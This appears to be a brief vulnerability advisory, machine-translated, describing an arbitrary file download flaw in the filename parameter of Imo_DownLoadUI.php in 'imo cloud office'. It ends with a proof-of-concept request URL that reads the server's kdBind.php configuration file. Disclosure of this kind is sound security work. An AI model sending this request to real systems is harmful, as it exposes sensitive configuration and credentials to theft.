Imo Cloud Office Imo_downloadui Php Any File Download Vulnerability
Imo Cloud Office Imo_downloadui Php Any File Download Vulnerability
imo cloud office Imo_DownLoadUI.php any file download vulnerability
Vulnerability Description
imo cloud office Because the filename parameter of /file/Placard/upload/Imo_DownLoadUI.php page is not filtered strictly, system sensitive files can be read.
Vulnerability Impact
imo Cloud Office
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/file/Placard/upload/Imo_DownLoadUI.php?cid=1&uid=1&type=1&filename=/OpenPlatform/config/kdBind.php
This post is licensed under CC BY 4.0 by the author.